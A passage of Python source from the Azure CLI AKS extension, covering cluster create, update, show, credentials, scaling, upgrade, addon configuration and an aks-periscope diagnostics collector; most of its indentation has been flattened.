client_id=principal_obj.get("service_principal"),
secret=principal_obj.get("client_secret"))
if attach_acr:
if enable_managed_identity:
if no_wait:
raise CLIError('When --attach-acr and --enable-managed-identity are both specified, '
'--no-wait is not allowed, please wait until the whole operation succeeds.')
else:
_ensure_aks_acr(cmd.cli_ctx,
client_id=service_principal_profile.client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if (vnet_subnet_id and not skip_subnet_role_assignment and
not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)):
scope = vnet_subnet_id
if not _add_role_assignment(
cmd.cli_ctx,
'Network Contributor',
service_principal_profile.client_id,
scope=scope):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
load_balancer_profile = create_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
outbound_type = _set_outbound_type(outbound_type, network_plugin, load_balancer_sku, load_balancer_profile)
network_profile = None
if any([network_plugin,
pod_cidr,
service_cidr,
dns_service_ip,
docker_bridge_address,
network_policy]):
if not network_plugin:
raise CLIError('Please explicitly specify the network plugin type')
if pod_cidr and network_plugin == "azure":
raise CLIError('Please use kubenet as the network plugin type when pod_cidr is specified')
network_profile = ContainerServiceNetworkProfile(
network_plugin=network_plugin,
pod_cidr=pod_cidr,
service_cidr=service_cidr,
dns_service_ip=dns_service_ip,
docker_bridge_cidr=docker_bridge_address,
network_policy=network_policy,
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type
)
else:
if load_balancer_sku.lower() == "standard" or load_balancer_profile:
network_profile = ContainerServiceNetworkProfile(
network_plugin="kubenet",
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type,
)
addon_profiles = _handle_addons_args(
cmd,
enable_addons,
subscription_id,
resource_group_name,
{},
workspace_resource_id,
appgw_name,
appgw_subnet_prefix,
appgw_id,
appgw_subnet_id,
appgw_shared,
appgw_watch_namespace
)
monitoring = False
if 'omsagent' in addon_profiles:
monitoring = True
_ensure_container_insights_for_monitoring(cmd, addon_profiles['omsagent'])
if CONST_INGRESS_APPGW_ADDON_NAME in addon_profiles:
if CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID in addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config:
appgw_id = addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID]
from msrestazure.tools import parse_resource_id, resource_id
appgw_id_dict = parse_resource_id(appgw_id)
appgw_group_id = resource_id(
subscription=appgw_id_dict["subscription"],
resource_group=appgw_id_dict["resource_group"])
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_profile.client_id, scope=appgw_group_id):
                logger.warning('Could not create a role assignment for application gateway: %s '
                               'specified in %s addon. '
                               'Are you an Owner on this subscription?',
                               appgw_id, CONST_INGRESS_APPGW_ADDON_NAME)
if CONST_INGRESS_APPGW_SUBNET_ID in addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config:
subnet_id = addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config[CONST_INGRESS_APPGW_SUBNET_ID]
from msrestazure.tools import parse_resource_id, resource_id
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_profile.client_id, scope=subnet_id):
                logger.warning('Could not create a role assignment for subnet: %s '
                               'specified in %s addon. '
                               'Are you an Owner on this subscription?',
                               subnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
aad_profile = None
if enable_aad:
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
raise CLIError('"--enable-aad" cannot be used together with '
'"--aad-client-app-id/--aad-server-app-id/--aad-server-app-secret"')
aad_profile = ManagedClusterAADProfile(
managed=True,
admin_group_object_ids=_parse_comma_separated_list(aad_admin_group_object_ids),
tenant_id=aad_tenant_id
)
else:
if aad_admin_group_object_ids is not None:
raise CLIError('"--admin-aad-object-id" can only be used together with "--enable-aad"')
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
aad_profile = ManagedClusterAADProfile(
client_app_id=aad_client_app_id,
server_app_id=aad_server_app_id,
server_app_secret=aad_server_app_secret,
tenant_id=aad_tenant_id
)
# Check that both --disable-rbac and --enable-rbac weren't provided
if all([disable_rbac, enable_rbac]):
raise CLIError('specify either "--disable-rbac" or "--enable-rbac", not both.')
api_server_access_profile = None
if api_server_authorized_ip_ranges:
api_server_access_profile = _populate_api_server_access_profile(api_server_authorized_ip_ranges)
identity = None
if enable_managed_identity:
identity = ManagedClusterIdentity(
type="SystemAssigned"
)
enable_rbac = True
if disable_rbac:
enable_rbac = False
mc = ManagedCluster(
location=location, tags=tags,
dns_prefix=dns_name_prefix,
kubernetes_version=kubernetes_version,
enable_rbac=enable_rbac,
agent_pool_profiles=[agent_pool_profile],
linux_profile=linux_profile,
windows_profile=windows_profile,
service_principal_profile=service_principal_profile,
network_profile=network_profile,
addon_profiles=addon_profiles,
aad_profile=aad_profile,
auto_scaler_profile=cluster_autoscaler_profile,
enable_pod_security_policy=bool(enable_pod_security_policy),
identity=identity,
disk_encryption_set_id=node_osdisk_diskencryptionset_id,
api_server_access_profile=api_server_access_profile)
if node_resource_group:
mc.node_resource_group = node_resource_group
if enable_private_cluster:
if load_balancer_sku.lower() != "standard":
raise CLIError("Please use standard load balancer for private cluster")
mc.api_server_access_profile = ManagedClusterAPIServerAccessProfile(
enable_private_cluster=True
)
if uptime_sla:
mc.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
headers = {}
if aks_custom_headers is not None:
if aks_custom_headers != "":
for pair in aks_custom_headers.split(','):
parts = pair.split('=')
if len(parts) != 2:
raise CLIError('custom headers format is incorrect')
headers[parts[0]] = parts[1]
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
logger.info('AKS cluster is creating, please wait...')
if monitoring:
# adding a wait here since we rely on the result for role assignment
created_cluster = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(
resource_group_name=resource_group_name,
resource_name=name,
parameters=mc,
custom_headers=headers))
cloud_name = cmd.cli_ctx.cloud.name
# add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
# mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
if cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(created_cluster, cluster_resource_id, cmd)
else:
created_cluster = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=mc,
custom_headers=headers).result()
if enable_managed_identity and attach_acr:
# Attach ACR to cluster enabled managed identity
if created_cluster.identity_profile is None or \
created_cluster.identity_profile["kubeletidentity"] is None:
logger.warning('Your cluster is successfully created, but we failed to attach the ACR to it. '
'You can manually grant permission to the identity named <CLUSTER_NAME>-agentpool '
'in the MC_ resource group to give it permission to pull from the ACR.')
else:
kubelet_identity_client_id = created_cluster.identity_profile["kubeletidentity"].client_id
_ensure_aks_acr(cmd.cli_ctx,
client_id=kubelet_identity_client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
return created_cluster
except CloudError as ex:
retry_exception = ex
if 'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
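# aks_update applies mutable cluster settings (cluster autoscaler and autoscaler profile,
# load balancer profile, pod security policy, ACR attach/detach, authorized IP ranges and
# the managed AAD profile) to an existing managed cluster. At least one of these options
# must be provided, otherwise a CLIError is raised before any GET/PUT is issued.
# Illustrative CLI usage (values are placeholders):
#   az aks update -g myResourceGroup -n myAKSCluster --enable-cluster-autoscaler --min-count 1 --max-count 5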
def aks_update(cmd, # pylint: disable=too-many-statements,too-many-branches,too-many-locals
client,
resource_group_name,
name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
min_count=None, max_count=None, no_wait=False,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
api_server_authorized_ip_ranges=None,
enable_pod_security_policy=False,
disable_pod_security_policy=False,
attach_acr=None,
detach_acr=None,
aad_tenant_id=None,
aad_admin_group_object_ids=None):
update_autoscaler = enable_cluster_autoscaler or disable_cluster_autoscaler or update_cluster_autoscaler
update_acr = attach_acr is not None or detach_acr is not None
update_pod_security = enable_pod_security_policy or disable_pod_security_policy
update_lb_profile = is_load_balancer_profile_provided(load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
update_aad_profile = not (aad_tenant_id is None and aad_admin_group_object_ids is None)
# pylint: disable=too-many-boolean-expressions
if not update_autoscaler and \
cluster_autoscaler_profile is None and \
not update_acr and \
not update_lb_profile and \
api_server_authorized_ip_ranges is None and \
not update_pod_security and \
not update_aad_profile:
raise CLIError('Please specify "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--cluster-autoscaler-profile" or '
'"--enable-pod-security-policy" or '
'"--disable-pod-security-policy" or '
'"--api-server-authorized-ip-ranges" or '
'"--attach-acr" or '
'"--detach-acr" or '
'"--load-balancer-managed-outbound-ip-count" or '
'"--load-balancer-outbound-ips" or '
'"--load-balancer-outbound-ip-prefixes" or '
'"--aad-tenant-id" or '
'"--aad-admin-group-object-ids"')
instance = client.get(resource_group_name, name)
if update_autoscaler and len(instance.agent_pool_profiles) > 1:
raise CLIError('There is more than one node pool in the cluster. Please use the "az aks nodepool" command '
'to update the autoscaler settings per node pool')
node_count = instance.agent_pool_profiles[0].count
if min_count is None or max_count is None:
if enable_cluster_autoscaler or update_cluster_autoscaler:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler is set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError('value of min-count should be less than or equal to value of max-count.')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError("current node count '{}' is not in the range of min-count and max-count.".format(node_count))
if enable_cluster_autoscaler:
if instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already enabled for this managed cluster.\n'
'Please run "az aks update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
instance.agent_pool_profiles[0].enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
raise CLIError('Cluster autoscaler is not enabled for this managed cluster.\n'
'Run "az aks update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already disabled for this managed cluster.')
return None
instance.agent_pool_profiles[0].enable_auto_scaling = False
instance.agent_pool_profiles[0].min_count = None
instance.agent_pool_profiles[0].max_count = None
# if intention is to clear profile
if cluster_autoscaler_profile == {}:
instance.auto_scaler_profile = {}
# else profile is provided, update instance profile if it exists
elif cluster_autoscaler_profile:
instance.auto_scaler_profile = _update_dict(instance.auto_scaler_profile.__dict__,
dict((key.replace("-", "_"), value)
for (key, value) in cluster_autoscaler_profile.items())) \
if instance.auto_scaler_profile else cluster_autoscaler_profile
if enable_pod_security_policy and disable_pod_security_policy:
raise CLIError('Cannot specify --enable-pod-security-policy and --disable-pod-security-policy '
'at the same time.')
if enable_pod_security_policy:
instance.enable_pod_security_policy = True
if disable_pod_security_policy:
instance.enable_pod_security_policy = False
if update_lb_profile:
instance.network_profile.load_balancer_profile = update_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout,
instance.network_profile.load_balancer_profile)
if attach_acr and detach_acr:
raise CLIError('Cannot specify "--attach-acr" and "--detach-acr" at the same time.')
subscription_id = get_subscription_id(cmd.cli_ctx)
client_id = ""
if instance.identity is not None and instance.identity.type == "SystemAssigned":
if instance.identity_profile is None or instance.identity_profile["kubeletidentity"] is None:
raise CLIError('Unexpected error getting kubelet\'s identity for the cluster. '
'Please do not set --attach-acr or --detach-acr. '
'You can manually grant or revoke permission to the identity named '
'<CLUSTER_NAME>-agentpool in the MC_ resource group to access ACR.')
client_id = instance.identity_profile["kubeletidentity"].client_id
else:
client_id = instance.service_principal_profile.client_id
if not client_id:
raise CLIError('Cannot get the AKS cluster\'s service principal.')
if attach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if detach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=detach_acr,
subscription_id=subscription_id,
detach=True)
# empty string is valid as it disables ip whitelisting
if api_server_authorized_ip_ranges is not None:
instance.api_server_access_profile = \
_populate_api_server_access_profile(api_server_authorized_ip_ranges, instance)
if update_aad_profile:
if instance.aad_profile is None or not instance.aad_profile.managed:
raise CLIError('Cannot specify "--aad-tenant-id/--aad-admin-group-object-ids"'
' if managed AAD is not enabled')
if aad_tenant_id is not None:
instance.aad_profile.tenant_id = aad_tenant_id
if aad_admin_group_object_ids is not None:
instance.aad_profile.admin_group_object_ids = _parse_comma_separated_list(aad_admin_group_object_ids)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
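# aks_show returns a single managed cluster with often-empty fields stripped out
# (see _remove_nulls below) so the JSON output is easier to read.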
def aks_show(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the Python SDK's behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
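# aks_get_credentials fetches a kubeconfig for the cluster (admin, clusterUser or
# clusterMonitoringUser credentials) and merges it into the file at `path`, or prints it
# to stdout when the path is "-".
# Illustrative CLI usage (values are placeholders):
#   az aks get-credentials -g myResourceGroup -n myAKSCluster --admin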
def aks_get_credentials(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
admin=False,
user='clusterUser',
path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
overwrite_existing=False,
context_name=None):
credentialResults = None
if admin:
credentialResults = client.list_cluster_admin_credentials(resource_group_name, name)
else:
if user.lower() == 'clusteruser':
credentialResults = client.list_cluster_user_credentials(resource_group_name, name)
elif user.lower() == 'clustermonitoringuser':
credentialResults = client.list_cluster_monitoring_user_credentials(resource_group_name, name)
else:
raise CLIError("The user is invalid.")
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(encoding='UTF-8')
_print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
ADDONS = {
'http_application_routing': 'httpApplicationRouting',
'monitoring': 'omsagent',
'virtual-node': 'aciConnector',
'azure-policy': 'azurepolicy',
'kube-dashboard': 'kubeDashboard',
'ingress-appgw': CONST_INGRESS_APPGW_ADDON_NAME
}
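# aks_kollect deploys the aks-periscope daemon set to the cluster to collect logs and
# diagnostic information and uploads the results to a storage account (either the one
# passed in or the one configured in the cluster's diagnostic settings). A SAS token is
# generated on the fly when one is not supplied.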
# pylint: disable=line-too-long
def aks_kollect(cmd, # pylint: disable=too-many-statements,too-many-locals
client,
resource_group_name,
name,
storage_account=None,
sas_token=None,
container_logs=None,
kube_objects=None,
node_logs=None):
colorama.init()
mc = client.get(resource_group_name, name)
if not which('kubectl'):
raise CLIError('Cannot find the kubectl executable in PATH')
storage_account_id = None
if storage_account is None:
print("No storage account specified. Try getting storage account from diagnostic settings")
storage_account_id = get_storage_account_from_diag_settings(cmd.cli_ctx, resource_group_name, name)
if storage_account_id is None:
raise CLIError("A storage account must be specified, since there isn't one in the diagnostic settings.")
from msrestazure.tools import is_valid_resource_id, parse_resource_id, resource_id
if storage_account_id is None:
if not is_valid_resource_id(storage_account):
storage_account_id = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Storage', type='storageAccounts',
name=storage_account
)
else:
storage_account_id = storage_account
if is_valid_resource_id(storage_account_id):
try:
parsed_storage_account = parse_resource_id(storage_account_id)
except CloudError as ex:
raise CLIError(ex.message)
else:
raise CLIError("Invalid storage account id %s" % storage_account_id)
storage_account_name = parsed_storage_account['name']
readonly_sas_token = None
if sas_token is None:
storage_client = cf_storage(cmd.cli_ctx, parsed_storage_account['subscription'])
storage_account_keys = storage_client.storage_accounts.list_keys(parsed_storage_account['resource_group'],
storage_account_name)
kwargs = {
'account_name': storage_account_name,
'account_key': storage_account_keys.keys[0].value
}
cloud_storage_client = cloud_storage_account_service_factory(cmd.cli_ctx, kwargs)
sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rwdlacup',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rl',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = readonly_sas_token.strip('?')
from knack.prompting import prompt_y_n
print()
print('This will deploy a daemon set to your cluster to collect logs and diagnostic information and '
f'save them to the storage account '
f'{colorama.Style.BRIGHT}{colorama.Fore.GREEN}{storage_account_name}{colorama.Style.RESET_ALL} as '
f'outlined in {format_hyperlink("http://aka.ms/AKSPeriscope")}.')
print()
print('If you share access to that storage account to Azure support, you consent to the terms outlined'
f' in {format_hyperlink("http://aka.ms/DiagConsent")}.')
print()
if not prompt_y_n('Do you confirm?', default="n"):
return
print()
print("Getting credentials for cluster %s " % name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=True, path=temp_kubeconfig_path)
print()
print("Starts collecting diag info for cluster %s " % name)
sas_token = sas_token.strip('?')
deployment_yaml = urlopen(
"https://raw.githubusercontent.com/Azure/aks-periscope/v0.2/deployment/aks-periscope.yaml").read().decode()
deployment_yaml = deployment_yaml.replace("# <accountName, base64 encoded>",
(base64.b64encode(bytes(storage_account_name, 'ascii'))).decode('ascii'))
deployment_yaml = deployment_yaml.replace("# <saskey, base64 encoded>",
(base64.b64encode(bytes("?" + sas_token, 'ascii'))).decode('ascii'))
yaml_lines = deployment_yaml.splitlines()
for index, line in enumerate(yaml_lines):
if "DIAGNOSTIC_CONTAINERLOGS_LIST" in line and container_logs is not None:
yaml_lines[index] = line + ' ' + container_logs
if "DIAGNOSTIC_KUBEOBJECTS_LIST" in line and kube_objects is not None:
yaml_lines[index] = line + ' ' + kube_objects
if "DIAGNOSTIC_NODELOGS_LIST" in line and node_logs is not None:
yaml_lines[index] = line + ' ' + node_logs
deployment_yaml = '\n'.join(yaml_lines)
fd, temp_yaml_path = tempfile.mkstemp()
temp_yaml_file = os.fdopen(fd, 'w+t')
try:
temp_yaml_file.write(deployment_yaml)
temp_yaml_file.flush()
temp_yaml_file.close()
try:
print()
print("Cleaning up aks-periscope resources if existing")
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"serviceaccount,configmap,daemonset,secret",
"--all", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding-view", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRole",
"aks-periscope-role", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"--all",
"apd", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.DEVNULL)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"CustomResourceDefinition",
"diagnostics.aks-periscope.azure.github.com", "--ignore-not-found"],
stderr=subprocess.STDOUT)
print()
print("Deploying aks-periscope")
subprocess.check_output(["kubectl", "--kubeconfig", temp_kubeconfig_path, "apply", "-f",
temp_yaml_path, "-n", "aks-periscope"], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
finally:
os.remove(temp_yaml_path)
print()
normalized_fqdn = mc.fqdn.replace('.', '-')
token_in_storage_account_url = readonly_sas_token if readonly_sas_token is not None else sas_token
log_storage_account_url = f"https://{storage_account_name}.blob.core.windows.net/" \
f"{_trim_fqdn_name_containing_hcp(normalized_fqdn)}?{token_in_storage_account_url}"
print(f'{colorama.Fore.GREEN}Your logs are being uploaded to storage account {format_bright(storage_account_name)}')
print()
print(f'You can download Azure Storage Explorer here '
f'{format_hyperlink("https://azure.microsoft.com/en-us/features/storage-explorer/")}'
f' to check the logs by adding the storage account using the following URL:')
print(f'{format_hyperlink(log_storage_account_url)}')
print()
if not prompt_y_n('Do you want to see analysis results now?', default="n"):
print(f"You can run 'az aks kanalyze -g {resource_group_name} -n {name}' "
f"anytime to check the analysis results.")
else:
display_diagnostics_report(temp_kubeconfig_path)
def aks_kanalyze(cmd, client, resource_group_name, name):
colorama.init()
client.get(resource_group_name, name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=True, path=temp_kubeconfig_path)
display_diagnostics_report(temp_kubeconfig_path)
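# aks_scale changes the node count of a single node pool. For multi-pool clusters the
# node pool name must be given explicitly, and scaling to 0 nodes is rejected.
# Illustrative CLI usage (values are placeholders):
#   az aks scale -g myResourceGroup -n myAKSCluster --node-count 5 --nodepool-name nodepool1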
def aks_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
node_count,
nodepool_name="",
no_wait=False):
instance = client.get(resource_group_name, name)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
raise CLIError('There is more than one node pool in the cluster. '
'Please specify a node pool name or use the "az aks nodepool" command to scale a specific node pool')
if node_count == 0:
raise CLIError("Can't scale down to 0 nodes.")
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
def aks_upgrade(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
kubernetes_version,
control_plane_only=False,
no_wait=False,
**kwargs): # pylint: disable=unused-argument
instance = client.get(resource_group_name, name)
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
from knack.prompting import prompt_y_n
upgrade_all = False
instance.kubernetes_version = kubernetes_version
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
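# _handle_addons_args translates the comma-separated --enable-addons argument into
# ManagedClusterAddonProfile objects, wiring up addon-specific configuration such as the
# Log Analytics workspace for monitoring and the Application Gateway settings for
# ingress-appgw. Unrecognized addon names cause a CLIError.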
def _handle_addons_args(cmd, addons_str, subscription_id, resource_group_name, addon_profiles=None,
workspace_resource_id=None, appgw_name=None, appgw_subnet_prefix=None, appgw_id=None, appgw_subnet_id=None, appgw_shared=False, appgw_watch_namespace=None):
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles['httpApplicationRouting'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('http_application_routing')
if 'kube-dashboard' in addons:
addon_profiles['kubeDashboard'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profiles['omsagent'] = ManagedClusterAddonProfile(
enabled=True, config={'logAnalyticsWorkspaceResourceID': workspace_resource_id})
addons.remove('monitoring')
# error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is
elif workspace_resource_id:
raise CLIError('"--workspace-resource-id" requires "--enable-addons monitoring".')
if 'azure-policy' in addons:
addon_profiles['azurepolicy'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('azure-policy')
if 'ingress-appgw' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_PREFIX] = appgw_subnet_prefix
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_shared:
addon_profile.config[CONST_INGRESS_APPGW_SHARED] = "true"
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME] = addon_profile
addons.remove('ingress-appgw')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
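# _ensure_default_log_analytics_workspace_for_monitoring picks (or creates) a default
# Log Analytics workspace named DefaultWorkspace-<subscription>-<regionCode> inside a
# DefaultResourceGroup-<regionCode> resource group, mapping the cluster's resource group
# location to a supported workspace region for the current cloud.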
def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name):
# mapping for azure public cloud
# log analytics workspaces cannot be created in WCUS region due to capacity limits
# so mapped to EUS per discussion with log analytics team
AzureCloudLocationToOmsRegionCodeMap = {
"australiasoutheast": "ASE",
"australiaeast": "EAU",
"australiacentral": "CAU",
"canadacentral": "CCA",
"centralindia": "CIN",
"centralus": "CUS",
"eastasia": "EA",
"eastus": "EUS",
"eastus2": "EUS2",
"eastus2euap": "EAP",
"francecentral": "PAR",
"japaneast": "EJP",
"koreacentral": "SE",
"northeurope": "NEU",
"southcentralus": "SCUS",
"southeastasia": "SEA",
"uksouth": "SUK",
"usgovvirginia": "USGV",
"westcentralus": "EUS",
"westeurope": "WEU",
"westus": "WUS",
"westus2": "WUS2"
}
AzureCloudRegionToOmsRegionMap = {
"australiacentral": "australiacentral",
"australiacentral2": "australiacentral",
"australiaeast": "australiaeast",
"australiasoutheast": "australiasoutheast",
"brazilsouth": "southcentralus",
"canadacentral": "canadacentral",
"canadaeast": "canadacentral",
"centralus": "centralus",
"centralindia": "centralindia",
"eastasia": "eastasia",
"eastus": "eastus",
